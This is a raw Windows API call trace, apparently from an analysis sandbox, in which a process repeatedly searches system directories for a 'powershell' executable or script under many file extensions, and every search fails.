	[0813.110] SetErrorMode (uMode=0x1) returned 0x1
	[0813.112] GetFullPathNameW (in: lpFileName="%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", nBufferLength=0x105, lpBuffer=0x1c74d7e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", lpFilePart=0x0) returned 0x41
	[0813.112] SetErrorMode (uMode=0x1) returned 0x1
	[0813.112] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\powershell.JS", lpFindFileData=0x1c74d980 | out: lpFindFileData=0x1c74d980*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0813.120] SetErrorMode (uMode=0x1) returned 0x1
	[0813.122] GetFullPathNameW (in: lpFileName="%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", nBufferLength=0x105, lpBuffer=0x1c74d7e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", lpFilePart=0x0) returned 0x41
	[0813.122] SetErrorMode (uMode=0x1) returned 0x1
	[0813.122] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\powershell.JSE", lpFindFileData=0x1c74d980 | out: lpFindFileData=0x1c74d980*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0813.131] SetErrorMode (uMode=0x1) returned 0x1
	[0813.132] GetFullPathNameW (in: lpFileName="%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", nBufferLength=0x105, lpBuffer=0x1c74d7e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", lpFilePart=0x0) returned 0x41
	[0813.132] SetErrorMode (uMode=0x1) returned 0x1
	[0813.132] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\powershell.WSF", lpFindFileData=0x1c74d980 | out: lpFindFileData=0x1c74d980*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0813.141] SetErrorMode (uMode=0x1) returned 0x1
	[0813.143] GetFullPathNameW (in: lpFileName="%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", nBufferLength=0x105, lpBuffer=0x1c74d7e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", lpFilePart=0x0) returned 0x41
	[0813.143] SetErrorMode (uMode=0x1) returned 0x1
	[0813.143] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\powershell.WSH", lpFindFileData=0x1c74d980 | out: lpFindFileData=0x1c74d980*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0813.151] SetErrorMode (uMode=0x1) returned 0x1
	[0813.153] GetFullPathNameW (in: lpFileName="%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", nBufferLength=0x105, lpBuffer=0x1c74d7e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", lpFilePart=0x0) returned 0x41
	[0814.352] SetErrorMode (uMode=0x1) returned 0x1
	[0814.352] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\powershell.MSC", lpFindFileData=0x1c74d980 | out: lpFindFileData=0x1c74d980*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0814.361] SetErrorMode (uMode=0x1) returned 0x1
	[0814.362] GetFullPathNameW (in: lpFileName="%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", nBufferLength=0x105, lpBuffer=0x1c74d7e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", lpFilePart=0x0) returned 0x41
	[0814.362] SetErrorMode (uMode=0x1) returned 0x1
	[0814.362] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\powershell", lpFindFileData=0x1c74d980 | out: lpFindFileData=0x1c74d980*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0814.370] SetErrorMode (uMode=0x1) returned 0x1
	[0814.372] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x1c74d7e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0814.372] SetErrorMode (uMode=0x1) returned 0x1
	[0814.372] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\powershell.ps1", lpFindFileData=0x1c74d980 | out: lpFindFileData=0x1c74d980*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0814.372] SetErrorMode (uMode=0x1) returned 0x1
	[0814.372] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x1c74d7e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0814.373] SetErrorMode (uMode=0x1) returned 0x1
	[0814.373] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\powershell.psm1", lpFindFileData=0x1c74d980 | out: lpFindFileData=0x1c74d980*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0814.373] SetErrorMode (uMode=0x1) returned 0x1
	[0814.373] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x1c74d7e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0814.373] SetErrorMode (uMode=0x1) returned 0x1
	[0814.373] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\powershell.psd1", lpFindFileData=0x1c74d980 | out: lpFindFileData=0x1c74d980*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0814.374] SetErrorMode (uMode=0x1) returned 0x1
	[0814.374] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x1c74d7e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0814.374] SetErrorMode (uMode=0x1) returned 0x1
	[0814.374] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\powershell.COM", lpFindFileData=0x1c74d980 | out: lpFindFileData=0x1c74d980*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0814.374] SetErrorMode (uMode=0x1) returned 0x1
	[0814.375] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x1c74d7e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0814.375] SetErrorMode (uMode=0x1) returned 0x1
	[0814.375] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\powershell.EXE", lpFindFileData=0x1c74d980 | out: lpFindFileData=0x1c74d980*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0814.375] SetErrorMode (uMode=0x1) returned 0x1
	[0814.375] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x1c74d7e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0814.375] SetErrorMode (uMode=0x1) returned 0x1
	[0814.376] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\powershell.BAT", lpFindFileData=0x1c74d980 | out: lpFindFileData=0x1c74d980*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0814.376] SetErrorMode (uMode=0x1) returned 0x1
	[0814.376] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x1c74d7e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0814.376] SetErrorMode (uMode=0x1) returned 0x1
	[0814.376] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\powershell.CMD", lpFindFileData=0x1c74d980 | out: lpFindFileData=0x1c74d980*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0814.376] SetErrorMode (uMode=0x1) returned 0x1
	[0814.377] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x1c74d7e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0814.377] SetErrorMode (uMode=0x1) returned 0x1
	[0814.377] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\powershell.VBS", lpFindFileData=0x1c74d980 | out: lpFindFileData=0x1c74d980*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0814.377] SetErrorMode (uMode=0x1) returned 0x1
	[0814.377] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x1c74d7e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0814.378] SetErrorMode (uMode=0x1) returned 0x1
	[0814.378] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\powershell.VBE", lpFindFileData=0x1c74d980 | out: lpFindFileData=0x1c74d980*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0814.378] SetErrorMode (uMode=0x1) returned 0x1
	[0814.378] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x1c74d7e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0814.378] SetErrorMode (uMode=0x1) returned 0x1
	[0814.378] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\powershell.JS", lpFindFileData=0x1c74d980 | out: lpFindFileData=0x1c74d980*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0814.379] SetErrorMode (uMode=0x1) returned 0x1
	[0814.379] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x1c74d7e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0814.379] SetErrorMode (uMode=0x1) returned 0x1
	[0814.379] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\powershell.JSE", lpFindFileData=0x1c74d980 | out: lpFindFileData=0x1c74d980*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0814.379] SetErrorMode (uMode=0x1) returned 0x1
	[0814.379] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x1c74d7e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0814.380] SetErrorMode (uMode=0x1) returned 0x1
	[0814.380] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\powershell.WSF", lpFindFileData=0x1c74d980 | out: lpFindFileData=0x1c74d980*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0814.380] SetErrorMode (uMode=0x1) returned 0x1
	[0814.380] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x1c74d7e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0814.380] SetErrorMode (uMode=0x1) returned 0x1
	[0814.380] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\powershell.WSH", lpFindFileData=0x1c74d980 | out: lpFindFileData=0x1c74d980*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0814.381] SetErrorMode (uMode=0x1) returned 0x1
	[0814.381] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x1c74d7e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0814.381] SetErrorMode (uMode=0x1) returned 0x1
	[0814.381] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\powershell.MSC", lpFindFileData=0x1c74d980 | out: lpFindFileData=0x1c74d980*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0814.381] SetErrorMode (uMode=0x1) returned 0x1
	[0814.382] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x1c74d7e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0814.382] SetErrorMode (uMode=0x1) returned 0x1
	[0814.382] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\powershell", lpFindFileData=0x1c74d980 | out: lpFindFileData=0x1c74d980*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0814.382] SetErrorMode (uMode=0x1) returned 0x1
	[0814.382] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x1c74d7e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa
	[0814.382] SetErrorMode (uMode=0x1) returned 0x1
	[0814.382] FindFirstFileW (in: lpFileName="C:\\Windows\\powershell.ps1", lpFindFileData=0x1c74d980 | out: lpFindFileData=0x1c74d980*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0814.383] SetErrorMode (uMode=0x1) returned 0x1
	[0814.383] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x1c74d7e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa
	[0814.383] SetErrorMode (uMode=0x1) returned 0x1
	[0814.383] FindFirstFileW (in: lpFileName="C:\\Windows\\powershell.psm1", lpFindFileData=0x1c74d980 | out: lpFindFileData=0x1c74d980*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0814.383] SetErrorMode (uMode=0x1) returned 0x1
	[0814.384] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x1c74d7e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa
	[0814.384] SetErrorMode (uMode=0x1) returned 0x1
	[0814.384] FindFirstFileW (in: lpFileName="C:\\Windows\\powershell.psd1", lpFindFileData=0x1c74d980 | out: lpFindFileData=0x1c74d980*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0814.384] SetErrorMode (uMode=0x1) returned 0x1
	[0814.384] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x1c74d7e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa
	[0814.384] SetErrorMode (uMode=0x1) returned 0x1
	[0814.385] FindFirstFileW (in: lpFileName="C:\\Windows\\powershell.COM", lpFindFileData=0x1c74d980 | out: lpFindFileData=0x1c74d980*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0814.385] SetErrorMode (uMode=0x1) returned 0x1
	[0814.385] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x1c74d7e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa
	[0814.385] SetErrorMode (uMode=0x1) returned 0x1
	[0815.717] FindFirstFileW (in: lpFileName="C:\\Windows\\powershell.EXE", lpFindFileData=0x1c74d980 | out: lpFindFileData=0x1c74d980*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0815.718] SetErrorMode (uMode=0x1) returned 0x1
	[0815.718] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x1c74d7e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa
	[0815.718] SetErrorMode (uMode=0x1) returned 0x1
	[0815.718] FindFirstFileW (in: lpFileName="C:\\Windows\\powershell.BAT", lpFindFileData=0x1c74d980 | out: lpFindFileData=0x1c74d980*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0815.719] SetErrorMode (uMode=0x1) returned 0x1
	[0815.719] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x1c74d7e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa
	[0815.719] SetErrorMode (uMode=0x1) returned 0x1
	[0815.719] FindFirstFileW (in: lpFileName="C:\\Windows\\powershell.CMD", lpFindFileData=0x1c74d980 | out: lpFindFileData=0x1c74d980*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0815.719] SetErrorMode (uMode=0x1) returned 0x1
	[0815.719] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x1c74d7e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa
	[0815.720] SetErrorMode (uMode=0x1) returned 0x1
	[0815.720] FindFirstFileW (in: lpFileName="C:\\Windows\\powershell.VBS", lpFindFileData=0x1c74d980 | out: lpFindFileData=0x1c74d980*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0815.720] SetErrorMode (uMode=0x1) returned 0x1
	[0815.720] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x1c74d7e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa
	[0815.720] SetErrorMode (uMode=0x1) returned 0x1
	[0815.720] FindFirstFileW (in: lpFileName="C:\\Windows\\powershell.VBE", lpFindFileData=0x1c74d980 | out: lpFindFileData=0x1c74d980*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0815.721] SetErrorMode (uMode=0x1) returned 0x1
